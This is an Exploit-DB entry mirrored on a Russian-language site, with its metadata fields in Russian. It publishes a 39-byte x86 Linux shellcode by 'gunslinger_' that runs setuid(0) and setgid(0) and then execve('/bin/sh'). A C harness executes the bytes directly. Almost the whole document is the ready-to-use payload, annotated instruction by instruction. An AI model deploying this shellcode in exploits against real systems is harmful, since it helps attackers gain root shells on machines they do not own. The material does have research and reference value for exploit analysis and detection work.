- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 13728
- Проверка EDB
-
- Пройдено
- Автор
- GUNSLINGER_
- Тип уязвимости
- SHELLCODE
- Платформа
- LINUX_X86
- CVE
- N/A
- Дата публикации
- 2010-06-01
C:
/*
Name : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date : Tue Jun 1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>
char *shellcode=
"\xeb\x19" /* jmp 0x804807b */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x17" /* mov $0x17,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x2e" /* mov $0x2e,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x0b" /* mov $0xb,%al */
"\x5b" /* pop %ebx */
"\x89\xd1" /* mov %edx,%ecx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe2\xff\xff\xff" /* call 0x8048062 */
"\x2f" /* das */
"\x62\x69\x6e" /* bound %ebp,0x6e(%ecx) */
"\x2f" /* das */
"\x73\x68" /* jae 0x80480ef */
"";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
((void (*)(void)) shellcode)();
return 0;
}
- Источник
- www.exploit-db.com